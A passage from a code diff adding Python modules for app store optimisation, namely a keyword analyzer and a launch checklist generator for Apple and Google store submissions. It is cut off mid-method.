COMPETITION_THRESHOLDS = {
|
||||||
|
'low': 1000,
|
||||||
|
'medium': 5000,
|
||||||
|
'high': 10000
|
||||||
|
}
|
||||||
|
|
||||||
|
# Search volume categories (monthly searches estimate)
|
||||||
|
VOLUME_CATEGORIES = {
|
||||||
|
'very_low': 1000,
|
||||||
|
'low': 5000,
|
||||||
|
'medium': 20000,
|
||||||
|
'high': 100000,
|
||||||
|
'very_high': 500000
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
"""Initialize keyword analyzer."""
|
||||||
|
self.analyzed_keywords = {}
|
||||||
|
|
||||||
|
def analyze_keyword(
|
||||||
|
self,
|
||||||
|
keyword: str,
|
||||||
|
search_volume: int = 0,
|
||||||
|
competing_apps: int = 0,
|
||||||
|
relevance_score: float = 0.0
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Analyze a single keyword for ASO potential.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
keyword: The keyword to analyze
|
||||||
|
search_volume: Estimated monthly search volume
|
||||||
|
competing_apps: Number of apps competing for this keyword
|
||||||
|
relevance_score: Relevance to your app (0.0-1.0)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dictionary with keyword analysis
|
||||||
|
"""
|
||||||
|
competition_level = self._calculate_competition_level(competing_apps)
|
||||||
|
volume_category = self._categorize_search_volume(search_volume)
|
||||||
|
difficulty_score = self._calculate_keyword_difficulty(
|
||||||
|
search_volume,
|
||||||
|
competing_apps
|
||||||
|
)
|
||||||
|
|
||||||
|
# Calculate potential score (0-100)
|
||||||
|
potential_score = self._calculate_potential_score(
|
||||||
|
search_volume,
|
||||||
|
competing_apps,
|
||||||
|
relevance_score
|
||||||
|
)
|
||||||
|
|
||||||
|
analysis = {
|
||||||
|
'keyword': keyword,
|
||||||
|
'search_volume': search_volume,
|
||||||
|
'volume_category': volume_category,
|
||||||
|
'competing_apps': competing_apps,
|
||||||
|
'competition_level': competition_level,
|
||||||
|
'relevance_score': relevance_score,
|
||||||
|
'difficulty_score': difficulty_score,
|
||||||
|
'potential_score': potential_score,
|
||||||
|
'recommendation': self._generate_recommendation(
|
||||||
|
potential_score,
|
||||||
|
difficulty_score,
|
||||||
|
relevance_score
|
||||||
|
),
|
||||||
|
'keyword_length': len(keyword.split()),
|
||||||
|
'is_long_tail': len(keyword.split()) >= 3
|
||||||
|
}
|
||||||
|
|
||||||
|
self.analyzed_keywords[keyword] = analysis
|
||||||
|
return analysis
|
||||||
|
|
||||||
|
def compare_keywords(self, keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Compare multiple keywords and rank by potential.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
keywords_data: List of dicts with keyword, search_volume, competing_apps, relevance_score
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Comparison report with ranked keywords
|
||||||
|
"""
|
||||||
|
analyses = []
|
||||||
|
for kw_data in keywords_data:
|
||||||
|
analysis = self.analyze_keyword(
|
||||||
|
keyword=kw_data['keyword'],
|
||||||
|
search_volume=kw_data.get('search_volume', 0),
|
||||||
|
competing_apps=kw_data.get('competing_apps', 0),
|
||||||
|
relevance_score=kw_data.get('relevance_score', 0.0)
|
||||||
|
)
|
||||||
|
analyses.append(analysis)
|
||||||
|
|
||||||
|
# Sort by potential score (descending)
|
||||||
|
ranked_keywords = sorted(
|
||||||
|
analyses,
|
||||||
|
key=lambda x: x['potential_score'],
|
||||||
|
reverse=True
|
||||||
|
)
|
||||||
|
|
||||||
|
# Categorize keywords
|
||||||
|
primary_keywords = [
|
||||||
|
kw for kw in ranked_keywords
|
||||||
|
if kw['potential_score'] >= 70 and kw['relevance_score'] >= 0.8
|
||||||
|
]
|
||||||
|
|
||||||
|
secondary_keywords = [
|
||||||
|
kw for kw in ranked_keywords
|
||||||
|
if 50 <= kw['potential_score'] < 70 and kw['relevance_score'] >= 0.6
|
||||||
|
]
|
||||||
|
|
||||||
|
long_tail_keywords = [
|
||||||
|
kw for kw in ranked_keywords
|
||||||
|
if kw['is_long_tail'] and kw['relevance_score'] >= 0.7
|
||||||
|
]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_keywords_analyzed': len(analyses),
|
||||||
|
'ranked_keywords': ranked_keywords,
|
||||||
|
'primary_keywords': primary_keywords[:5], # Top 5
|
||||||
|
'secondary_keywords': secondary_keywords[:10], # Top 10
|
||||||
|
'long_tail_keywords': long_tail_keywords[:10], # Top 10
|
||||||
|
'summary': self._generate_comparison_summary(
|
||||||
|
primary_keywords,
|
||||||
|
secondary_keywords,
|
||||||
|
long_tail_keywords
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def find_long_tail_opportunities(
|
||||||
|
self,
|
||||||
|
base_keyword: str,
|
||||||
|
modifiers: List[str]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""
|
||||||
|
Generate long-tail keyword variations.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
base_keyword: Core keyword (e.g., "task manager")
|
||||||
|
modifiers: List of modifiers (e.g., ["free", "simple", "team"])
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
List of long-tail keyword suggestions
|
||||||
|
"""
|
||||||
|
long_tail_keywords = []
|
||||||
|
|
||||||
|
# Generate combinations
|
||||||
|
for modifier in modifiers:
|
||||||
|
# Modifier + base
|
||||||
|
variation1 = f"{modifier} {base_keyword}"
|
||||||
|
long_tail_keywords.append({
|
||||||
|
'keyword': variation1,
|
||||||
|
'pattern': 'modifier_base',
|
||||||
|
'estimated_competition': 'low',
|
||||||
|
'rationale': f"Less competitive variation of '{base_keyword}'"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Base + modifier
|
||||||
|
variation2 = f"{base_keyword} {modifier}"
|
||||||
|
long_tail_keywords.append({
|
||||||
|
'keyword': variation2,
|
||||||
|
'pattern': 'base_modifier',
|
||||||
|
'estimated_competition': 'low',
|
||||||
|
'rationale': f"Specific use-case variation of '{base_keyword}'"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Add question-based long-tail
|
||||||
|
question_words = ['how', 'what', 'best', 'top']
|
||||||
|
for q_word in question_words:
|
||||||
|
question_keyword = f"{q_word} {base_keyword}"
|
||||||
|
long_tail_keywords.append({
|
||||||
|
'keyword': question_keyword,
|
||||||
|
'pattern': 'question_based',
|
||||||
|
'estimated_competition': 'very_low',
|
||||||
|
'rationale': f"Informational search query"
|
||||||
|
})
|
||||||
|
|
||||||
|
return long_tail_keywords
|
||||||
|
|
||||||
|
def extract_keywords_from_text(
|
||||||
|
self,
|
||||||
|
text: str,
|
||||||
|
min_word_length: int = 3
|
||||||
|
) -> List[Tuple[str, int]]:
|
||||||
|
"""
|
||||||
|
Extract potential keywords from text (descriptions, reviews).
|
||||||
|
|
||||||
|
Args:
|
||||||
|
text: Text to analyze
|
||||||
|
min_word_length: Minimum word length to consider
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
List of (keyword, frequency) tuples
|
||||||
|
"""
|
||||||
|
# Clean and normalize text
|
||||||
|
text = text.lower()
|
||||||
|
text = re.sub(r'[^\w\s]', ' ', text)
|
||||||
|
|
||||||
|
# Extract words
|
||||||
|
words = text.split()
|
||||||
|
|
||||||
|
# Filter by length
|
||||||
|
words = [w for w in words if len(w) >= min_word_length]
|
||||||
|
|
||||||
|
# Remove common stop words
|
||||||
|
stop_words = {
|
||||||
|
'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
|
||||||
|
'but', 'not', 'you', 'all', 'can', 'are', 'was', 'were', 'been'
|
||||||
|
}
|
||||||
|
words = [w for w in words if w not in stop_words]
|
||||||
|
|
||||||
|
# Count frequency
|
||||||
|
word_counts = Counter(words)
|
||||||
|
|
||||||
|
# Extract 2-word phrases
|
||||||
|
phrases = []
|
||||||
|
for i in range(len(words) - 1):
|
||||||
|
phrase = f"{words[i]} {words[i+1]}"
|
||||||
|
phrases.append(phrase)
|
||||||
|
|
||||||
|
phrase_counts = Counter(phrases)
|
||||||
|
|
||||||
|
# Combine and sort
|
||||||
|
all_keywords = list(word_counts.items()) + list(phrase_counts.items())
|
||||||
|
all_keywords.sort(key=lambda x: x[1], reverse=True)
|
||||||
|
|
||||||
|
return all_keywords[:50] # Top 50
|
||||||
|
|
||||||
|
def calculate_keyword_density(
|
||||||
|
self,
|
||||||
|
text: str,
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, float]:
|
||||||
|
"""
|
||||||
|
Calculate keyword density in text.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
text: Text to analyze (title, description)
|
||||||
|
target_keywords: Keywords to check density for
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dictionary of keyword: density (percentage)
|
||||||
|
"""
|
||||||
|
text_lower = text.lower()
|
||||||
|
total_words = len(text_lower.split())
|
||||||
|
|
||||||
|
densities = {}
|
||||||
|
for keyword in target_keywords:
|
||||||
|
keyword_lower = keyword.lower()
|
||||||
|
occurrences = text_lower.count(keyword_lower)
|
||||||
|
density = (occurrences / total_words) * 100 if total_words > 0 else 0
|
||||||
|
densities[keyword] = round(density, 2)
|
||||||
|
|
||||||
|
return densities
|
||||||
|
|
||||||
|
def _calculate_competition_level(self, competing_apps: int) -> str:
|
||||||
|
"""Determine competition level based on number of competing apps."""
|
||||||
|
if competing_apps < self.COMPETITION_THRESHOLDS['low']:
|
||||||
|
return 'low'
|
||||||
|
elif competing_apps < self.COMPETITION_THRESHOLDS['medium']:
|
||||||
|
return 'medium'
|
||||||
|
elif competing_apps < self.COMPETITION_THRESHOLDS['high']:
|
||||||
|
return 'high'
|
||||||
|
else:
|
||||||
|
return 'very_high'
|
||||||
|
|
||||||
|
def _categorize_search_volume(self, search_volume: int) -> str:
|
||||||
|
"""Categorize search volume."""
|
||||||
|
if search_volume < self.VOLUME_CATEGORIES['very_low']:
|
||||||
|
return 'very_low'
|
||||||
|
elif search_volume < self.VOLUME_CATEGORIES['low']:
|
||||||
|
return 'low'
|
||||||
|
elif search_volume < self.VOLUME_CATEGORIES['medium']:
|
||||||
|
return 'medium'
|
||||||
|
elif search_volume < self.VOLUME_CATEGORIES['high']:
|
||||||
|
return 'high'
|
||||||
|
else:
|
||||||
|
return 'very_high'
|
||||||
|
|
||||||
|
def _calculate_keyword_difficulty(
|
||||||
|
self,
|
||||||
|
search_volume: int,
|
||||||
|
competing_apps: int
|
||||||
|
) -> float:
|
||||||
|
"""
|
||||||
|
Calculate keyword difficulty score (0-100).
|
||||||
|
Higher score = harder to rank.
|
||||||
|
"""
|
||||||
|
if competing_apps == 0:
|
||||||
|
return 0.0
|
||||||
|
|
||||||
|
# Competition factor (0-1)
|
||||||
|
competition_factor = min(competing_apps / 50000, 1.0)
|
||||||
|
|
||||||
|
# Volume factor (0-1) - higher volume = more difficulty
|
||||||
|
volume_factor = min(search_volume / 1000000, 1.0)
|
||||||
|
|
||||||
|
# Difficulty score (weighted average)
|
||||||
|
difficulty = (competition_factor * 0.7 + volume_factor * 0.3) * 100
|
||||||
|
|
||||||
|
return round(difficulty, 1)
|
||||||
|
|
||||||
|
def _calculate_potential_score(
|
||||||
|
self,
|
||||||
|
search_volume: int,
|
||||||
|
competing_apps: int,
|
||||||
|
relevance_score: float
|
||||||
|
) -> float:
|
||||||
|
"""
|
||||||
|
Calculate overall keyword potential (0-100).
|
||||||
|
Higher score = better opportunity.
|
||||||
|
"""
|
||||||
|
# Volume score (0-40 points)
|
||||||
|
volume_score = min((search_volume / 100000) * 40, 40)
|
||||||
|
|
||||||
|
# Competition score (0-30 points) - inverse relationship
|
||||||
|
if competing_apps > 0:
|
||||||
|
competition_score = max(30 - (competing_apps / 500), 0)
|
||||||
|
else:
|
||||||
|
competition_score = 30
|
||||||
|
|
||||||
|
# Relevance score (0-30 points)
|
||||||
|
relevance_points = relevance_score * 30
|
||||||
|
|
||||||
|
total_score = volume_score + competition_score + relevance_points
|
||||||
|
|
||||||
|
return round(min(total_score, 100), 1)
|
||||||
|
|
||||||
|
def _generate_recommendation(
|
||||||
|
self,
|
||||||
|
potential_score: float,
|
||||||
|
difficulty_score: float,
|
||||||
|
relevance_score: float
|
||||||
|
) -> str:
|
||||||
|
"""Generate actionable recommendation for keyword."""
|
||||||
|
if relevance_score < 0.5:
|
||||||
|
return "Low relevance - avoid targeting"
|
||||||
|
|
||||||
|
if potential_score >= 70:
|
||||||
|
return "High priority - target immediately"
|
||||||
|
elif potential_score >= 50:
|
||||||
|
if difficulty_score < 50:
|
||||||
|
return "Good opportunity - include in metadata"
|
||||||
|
else:
|
||||||
|
return "Competitive - use in description, not title"
|
||||||
|
elif potential_score >= 30:
|
||||||
|
return "Secondary keyword - use for long-tail variations"
|
||||||
|
else:
|
||||||
|
return "Low potential - deprioritize"
|
||||||
|
|
||||||
|
def _generate_comparison_summary(
|
||||||
|
self,
|
||||||
|
primary_keywords: List[Dict[str, Any]],
|
||||||
|
secondary_keywords: List[Dict[str, Any]],
|
||||||
|
long_tail_keywords: List[Dict[str, Any]]
|
||||||
|
) -> str:
|
||||||
|
"""Generate summary of keyword comparison."""
|
||||||
|
summary_parts = []
|
||||||
|
|
||||||
|
summary_parts.append(
|
||||||
|
f"Identified {len(primary_keywords)} high-priority primary keywords."
|
||||||
|
)
|
||||||
|
|
||||||
|
if primary_keywords:
|
||||||
|
top_keyword = primary_keywords[0]['keyword']
|
||||||
|
summary_parts.append(
|
||||||
|
f"Top recommendation: '{top_keyword}' (potential score: {primary_keywords[0]['potential_score']})."
|
||||||
|
)
|
||||||
|
|
||||||
|
summary_parts.append(
|
||||||
|
f"Found {len(secondary_keywords)} secondary keywords for description and metadata."
|
||||||
|
)
|
||||||
|
|
||||||
|
summary_parts.append(
|
||||||
|
f"Discovered {len(long_tail_keywords)} long-tail opportunities with lower competition."
|
||||||
|
)
|
||||||
|
|
||||||
|
return " ".join(summary_parts)
|
||||||
|
|
||||||
|
|
||||||
|
def analyze_keyword_set(keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to analyze a set of keywords.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
keywords_data: List of keyword data dictionaries
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete analysis report
|
||||||
|
"""
|
||||||
|
analyzer = KeywordAnalyzer()
|
||||||
|
return analyzer.compare_keywords(keywords_data)
|
||||||
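The weighting in `_calculate_potential_score` can be checked by hand. A standalone sketch of the same arithmetic (the free function here is for illustration; the class method above is the source of truth):

```python
def potential_score(search_volume, competing_apps, relevance_score):
    # Same weighting as KeywordAnalyzer._calculate_potential_score:
    # up to 40 points for volume, 30 for (low) competition, 30 for relevance.
    volume_score = min((search_volume / 100000) * 40, 40)
    competition_score = max(30 - (competing_apps / 500), 0) if competing_apps > 0 else 30
    return round(min(volume_score + competition_score + relevance_score * 30, 100), 1)

# High-volume but crowded keyword: volume 18.0 + competition 6.0 + relevance 28.5
print(potential_score(45000, 12000, 0.95))
```

Note the asymmetry: competition drains its 30 points after only 15,000 competing apps (12000/500 = 24 points lost here), while volume saturates slowly, so crowded generic terms score lower than the raw volume suggests.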
739
skills/app-store-optimization/launch_checklist.py
Normal file
@@ -0,0 +1,739 @@
"""
|
||||||
|
Launch checklist module for App Store Optimization.
|
||||||
|
Generates comprehensive pre-launch and update checklists.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
from datetime import datetime, timedelta
|
||||||
|
|
||||||
|
|
||||||
|
class LaunchChecklistGenerator:
|
||||||
|
"""Generates comprehensive checklists for app launches and updates."""
|
||||||
|
|
||||||
|
def __init__(self, platform: str = 'both'):
|
||||||
|
"""
|
||||||
|
Initialize checklist generator.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
platform: 'apple', 'google', or 'both'
|
||||||
|
"""
|
||||||
|
if platform not in ['apple', 'google', 'both']:
|
||||||
|
raise ValueError("Platform must be 'apple', 'google', or 'both'")
|
||||||
|
|
||||||
|
self.platform = platform
|
||||||
|
|
||||||
|
def generate_prelaunch_checklist(
|
||||||
|
self,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
launch_date: Optional[str] = None
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Generate comprehensive pre-launch checklist.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_info: App information (name, category, target_audience)
|
||||||
|
launch_date: Target launch date (YYYY-MM-DD)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete pre-launch checklist
|
||||||
|
"""
|
||||||
|
checklist = {
|
||||||
|
'app_info': app_info,
|
||||||
|
'launch_date': launch_date,
|
||||||
|
'checklists': {}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Generate platform-specific checklists
|
||||||
|
if self.platform in ['apple', 'both']:
|
||||||
|
checklist['checklists']['apple'] = self._generate_apple_checklist(app_info)
|
||||||
|
|
||||||
|
if self.platform in ['google', 'both']:
|
||||||
|
checklist['checklists']['google'] = self._generate_google_checklist(app_info)
|
||||||
|
|
||||||
|
# Add universal checklist items
|
||||||
|
checklist['checklists']['universal'] = self._generate_universal_checklist(app_info)
|
||||||
|
|
||||||
|
# Generate timeline
|
||||||
|
if launch_date:
|
||||||
|
checklist['timeline'] = self._generate_launch_timeline(launch_date)
|
||||||
|
|
||||||
|
# Calculate completion status
|
||||||
|
checklist['summary'] = self._calculate_checklist_summary(checklist['checklists'])
|
||||||
|
|
||||||
|
return checklist
|
||||||
|
|
||||||
|
def validate_app_store_compliance(
|
||||||
|
self,
|
||||||
|
app_data: Dict[str, Any],
|
||||||
|
platform: str = 'apple'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Validate compliance with app store guidelines.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_data: App data including metadata, privacy policy, etc.
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Compliance validation report
|
||||||
|
"""
|
||||||
|
validation_results = {
|
||||||
|
'platform': platform,
|
||||||
|
'is_compliant': True,
|
||||||
|
'errors': [],
|
||||||
|
'warnings': [],
|
||||||
|
'recommendations': []
|
||||||
|
}
|
||||||
|
|
||||||
|
if platform == 'apple':
|
||||||
|
self._validate_apple_compliance(app_data, validation_results)
|
||||||
|
elif platform == 'google':
|
||||||
|
self._validate_google_compliance(app_data, validation_results)
|
||||||
|
|
||||||
|
# Determine overall compliance
|
||||||
|
validation_results['is_compliant'] = len(validation_results['errors']) == 0
|
||||||
|
|
||||||
|
return validation_results
|
||||||
|
|
||||||
|
    def create_update_plan(
        self,
        current_version: str,
        planned_features: List[str],
        update_frequency: str = 'monthly'
    ) -> Dict[str, Any]:
        """
        Create update cadence and feature rollout plan.

        Args:
            current_version: Current app version
            planned_features: List of planned features
            update_frequency: 'weekly', 'biweekly', 'monthly', 'quarterly'

        Returns:
            Update plan with cadence and feature schedule
        """
        # Calculate next versions
        next_versions = self._calculate_next_versions(
            current_version,
            update_frequency,
            len(planned_features)
        )

        # Distribute features across versions
        feature_schedule = self._distribute_features(
            planned_features,
            next_versions
        )

        # Generate "What's New" templates
        whats_new_templates = [
            self._generate_whats_new_template(version_data)
            for version_data in feature_schedule
        ]

        return {
            'current_version': current_version,
            'update_frequency': update_frequency,
            'planned_updates': len(feature_schedule),
            'feature_schedule': feature_schedule,
            'whats_new_templates': whats_new_templates,
            'recommendations': self._generate_update_recommendations(update_frequency)
        }

    def optimize_launch_timing(
        self,
        app_category: str,
        target_audience: str,
        current_date: Optional[str] = None
    ) -> Dict[str, Any]:
        """
        Recommend optimal launch timing.

        Args:
            app_category: App category
            target_audience: Target audience description
            current_date: Current date (YYYY-MM-DD), defaults to today

        Returns:
            Launch timing recommendations
        """
        if not current_date:
            current_date = datetime.now().strftime('%Y-%m-%d')

        # Analyze launch timing factors
        day_of_week_rec = self._recommend_day_of_week(app_category)
        seasonal_rec = self._recommend_seasonal_timing(app_category, current_date)
        competitive_rec = self._analyze_competitive_timing(app_category)

        # Calculate optimal dates
        optimal_dates = self._calculate_optimal_dates(
            current_date,
            day_of_week_rec,
            seasonal_rec
        )

        return {
            'current_date': current_date,
            'optimal_launch_dates': optimal_dates,
            'day_of_week_recommendation': day_of_week_rec,
            'seasonal_considerations': seasonal_rec,
            'competitive_timing': competitive_rec,
            'final_recommendation': self._generate_timing_recommendation(
                optimal_dates,
                seasonal_rec
            )
        }

    def plan_seasonal_campaigns(
        self,
        app_category: str,
        current_month: Optional[int] = None
    ) -> Dict[str, Any]:
        """
        Identify seasonal opportunities for ASO campaigns.

        Args:
            app_category: App category
            current_month: Current month (1-12), defaults to current

        Returns:
            Seasonal campaign opportunities
        """
        if not current_month:
            current_month = datetime.now().month

        # Identify relevant seasonal events
        seasonal_opportunities = self._identify_seasonal_opportunities(
            app_category,
            current_month
        )

        # Generate campaign ideas
        campaigns = [
            self._generate_seasonal_campaign(opportunity)
            for opportunity in seasonal_opportunities
        ]

        return {
            'current_month': current_month,
            'category': app_category,
            'seasonal_opportunities': seasonal_opportunities,
            'campaign_ideas': campaigns,
            'implementation_timeline': self._create_seasonal_timeline(campaigns)
        }
    def _generate_apple_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Generate Apple App Store specific checklist."""
        return [
            {
                'category': 'App Store Connect Setup',
                'items': [
                    {'task': 'App Store Connect account created', 'status': 'pending'},
                    {'task': 'App bundle ID registered', 'status': 'pending'},
                    {'task': 'App Privacy declarations completed', 'status': 'pending'},
                    {'task': 'Age rating questionnaire completed', 'status': 'pending'}
                ]
            },
            {
                'category': 'Metadata (Apple)',
                'items': [
                    {'task': 'App title (30 chars max)', 'status': 'pending'},
                    {'task': 'Subtitle (30 chars max)', 'status': 'pending'},
                    {'task': 'Promotional text (170 chars max)', 'status': 'pending'},
                    {'task': 'Description (4000 chars max)', 'status': 'pending'},
                    {'task': 'Keywords (100 chars, comma-separated)', 'status': 'pending'},
                    {'task': 'Category selection (primary + secondary)', 'status': 'pending'}
                ]
            },
            {
                'category': 'Visual Assets (Apple)',
                'items': [
                    {'task': 'App icon (1024x1024px)', 'status': 'pending'},
                    {'task': 'Screenshots (iPhone 6.7" required)', 'status': 'pending'},
                    {'task': 'Screenshots (iPhone 5.5" required)', 'status': 'pending'},
                    {'task': 'Screenshots (iPad Pro 12.9" if iPad app)', 'status': 'pending'},
                    {'task': 'App preview video (optional but recommended)', 'status': 'pending'}
                ]
            },
            {
                'category': 'Technical Requirements (Apple)',
                'items': [
                    {'task': 'Build uploaded to App Store Connect', 'status': 'pending'},
                    {'task': 'TestFlight testing completed', 'status': 'pending'},
                    {'task': 'App tested on required iOS versions', 'status': 'pending'},
                    {'task': 'Crash-free rate > 99%', 'status': 'pending'},
                    {'task': 'All links in app/metadata working', 'status': 'pending'}
                ]
            },
            {
                'category': 'Legal & Privacy (Apple)',
                'items': [
                    {'task': 'Privacy Policy URL provided', 'status': 'pending'},
                    {'task': 'Terms of Service URL (if applicable)', 'status': 'pending'},
                    {'task': 'Data collection declarations accurate', 'status': 'pending'},
                    {'task': 'Third-party SDKs disclosed', 'status': 'pending'}
                ]
            }
        ]

    def _generate_google_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Generate Google Play Store specific checklist."""
        return [
            {
                'category': 'Play Console Setup',
                'items': [
                    {'task': 'Google Play Console account created', 'status': 'pending'},
                    {'task': 'Developer profile completed', 'status': 'pending'},
                    {'task': 'Payment merchant account linked (if paid app)', 'status': 'pending'},
                    {'task': 'Content rating questionnaire completed', 'status': 'pending'}
                ]
            },
            {
                'category': 'Metadata (Google)',
                'items': [
                    {'task': 'App title (50 chars max)', 'status': 'pending'},
                    {'task': 'Short description (80 chars max)', 'status': 'pending'},
                    {'task': 'Full description (4000 chars max)', 'status': 'pending'},
                    {'task': 'Category selection', 'status': 'pending'},
                    {'task': 'Tags (up to 5)', 'status': 'pending'}
                ]
            },
            {
                'category': 'Visual Assets (Google)',
                'items': [
                    {'task': 'App icon (512x512px)', 'status': 'pending'},
                    {'task': 'Feature graphic (1024x500px)', 'status': 'pending'},
                    {'task': 'Screenshots (2-8 required, phone)', 'status': 'pending'},
                    {'task': 'Screenshots (tablet, if applicable)', 'status': 'pending'},
                    {'task': 'Promo video (YouTube link, optional)', 'status': 'pending'}
                ]
            },
            {
                'category': 'Technical Requirements (Google)',
                'items': [
                    {'task': 'APK/AAB uploaded to Play Console', 'status': 'pending'},
                    {'task': 'Internal testing completed', 'status': 'pending'},
                    {'task': 'App tested on required Android versions', 'status': 'pending'},
                    {'task': 'Target API level meets requirements', 'status': 'pending'},
                    {'task': 'All permissions justified', 'status': 'pending'}
                ]
            },
            {
                'category': 'Legal & Privacy (Google)',
                'items': [
                    {'task': 'Privacy Policy URL provided', 'status': 'pending'},
                    {'task': 'Data safety section completed', 'status': 'pending'},
                    {'task': 'Ads disclosure (if applicable)', 'status': 'pending'},
                    {'task': 'In-app purchase disclosure (if applicable)', 'status': 'pending'}
                ]
            }
        ]
    def _generate_universal_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Generate universal (both platforms) checklist."""
        return [
            {
                'category': 'Pre-Launch Marketing',
                'items': [
                    {'task': 'Landing page created', 'status': 'pending'},
                    {'task': 'Social media accounts setup', 'status': 'pending'},
                    {'task': 'Press kit prepared', 'status': 'pending'},
                    {'task': 'Beta tester feedback collected', 'status': 'pending'},
                    {'task': 'Launch announcement drafted', 'status': 'pending'}
                ]
            },
            {
                'category': 'ASO Preparation',
                'items': [
                    {'task': 'Keyword research completed', 'status': 'pending'},
                    {'task': 'Competitor analysis done', 'status': 'pending'},
                    {'task': 'A/B test plan created for post-launch', 'status': 'pending'},
                    {'task': 'Analytics tracking configured', 'status': 'pending'}
                ]
            },
            {
                'category': 'Quality Assurance',
                'items': [
                    {'task': 'All core features tested', 'status': 'pending'},
                    {'task': 'User flows validated', 'status': 'pending'},
                    {'task': 'Performance testing completed', 'status': 'pending'},
                    {'task': 'Accessibility features tested', 'status': 'pending'},
                    {'task': 'Security audit completed', 'status': 'pending'}
                ]
            },
            {
                'category': 'Support Infrastructure',
                'items': [
                    {'task': 'Support email/system setup', 'status': 'pending'},
                    {'task': 'FAQ page created', 'status': 'pending'},
                    {'task': 'Documentation for users prepared', 'status': 'pending'},
                    {'task': 'Team trained on handling reviews', 'status': 'pending'}
                ]
            }
        ]
    def _generate_launch_timeline(self, launch_date: str) -> List[Dict[str, Any]]:
        """Generate timeline with milestones leading to launch."""
        launch_dt = datetime.strptime(launch_date, '%Y-%m-%d')

        milestones = [
            {
                'date': (launch_dt - timedelta(days=90)).strftime('%Y-%m-%d'),
                'milestone': '90 days before: Complete keyword research and competitor analysis'
            },
            {
                'date': (launch_dt - timedelta(days=60)).strftime('%Y-%m-%d'),
                'milestone': '60 days before: Finalize metadata and visual assets'
            },
            {
                'date': (launch_dt - timedelta(days=45)).strftime('%Y-%m-%d'),
                'milestone': '45 days before: Begin beta testing program'
            },
            {
                'date': (launch_dt - timedelta(days=30)).strftime('%Y-%m-%d'),
                'milestone': '30 days before: Submit app for review (Apple typically takes 1-2 days, Google instant)'
            },
            {
                'date': (launch_dt - timedelta(days=14)).strftime('%Y-%m-%d'),
                'milestone': '14 days before: Prepare launch marketing materials'
            },
            {
                'date': (launch_dt - timedelta(days=7)).strftime('%Y-%m-%d'),
                'milestone': '7 days before: Set up analytics and monitoring'
            },
            {
                'date': launch_dt.strftime('%Y-%m-%d'),
                'milestone': 'Launch Day: Release app and execute marketing plan'
            },
            {
                'date': (launch_dt + timedelta(days=7)).strftime('%Y-%m-%d'),
                'milestone': '7 days after: Monitor metrics, respond to reviews, address critical issues'
            },
            {
                'date': (launch_dt + timedelta(days=30)).strftime('%Y-%m-%d'),
                'milestone': '30 days after: Analyze launch metrics, plan first update'
            }
        ]

        return milestones
    def _calculate_checklist_summary(self, checklists: Dict[str, List[Dict[str, Any]]]) -> Dict[str, Any]:
        """Calculate completion summary."""
        total_items = 0
        completed_items = 0

        for platform, categories in checklists.items():
            for category in categories:
                for item in category['items']:
                    total_items += 1
                    if item['status'] == 'completed':
                        completed_items += 1

        completion_percentage = (completed_items / total_items * 100) if total_items > 0 else 0

        return {
            'total_items': total_items,
            'completed_items': completed_items,
            'pending_items': total_items - completed_items,
            'completion_percentage': round(completion_percentage, 1),
            'is_ready_to_launch': completion_percentage == 100
        }
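The completion math above is easy to check in isolation. Below is a minimal standalone sketch of the same counting logic (the `checklist_summary` name and the sample data are illustrative, not part of the repo):

```python
# Standalone sketch of _calculate_checklist_summary's counting logic,
# assuming the same {platform: [{'items': [{'status': ...}, ...]}]} shape.
def checklist_summary(checklists):
    total_items = 0
    completed_items = 0
    for categories in checklists.values():
        for category in categories:
            for item in category['items']:
                total_items += 1
                if item['status'] == 'completed':
                    completed_items += 1
    # Guard against division by zero for an empty checklist
    percentage = (completed_items / total_items * 100) if total_items > 0 else 0
    return {
        'total_items': total_items,
        'completed_items': completed_items,
        'completion_percentage': round(percentage, 1),
        'is_ready_to_launch': percentage == 100,
    }
```

With one completed item out of three, this reports 33.3% and not ready to launch.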
    def _validate_apple_compliance(
        self,
        app_data: Dict[str, Any],
        validation_results: Dict[str, Any]
    ) -> None:
        """Validate Apple App Store compliance."""
        # Check for required fields
        if not app_data.get('privacy_policy_url'):
            validation_results['errors'].append("Privacy Policy URL is required")

        if not app_data.get('app_icon'):
            validation_results['errors'].append("App icon (1024x1024px) is required")

        # Check metadata character limits
        title = app_data.get('title', '')
        if len(title) > 30:
            validation_results['errors'].append(f"Title exceeds 30 characters ({len(title)})")

        # Warnings for best practices
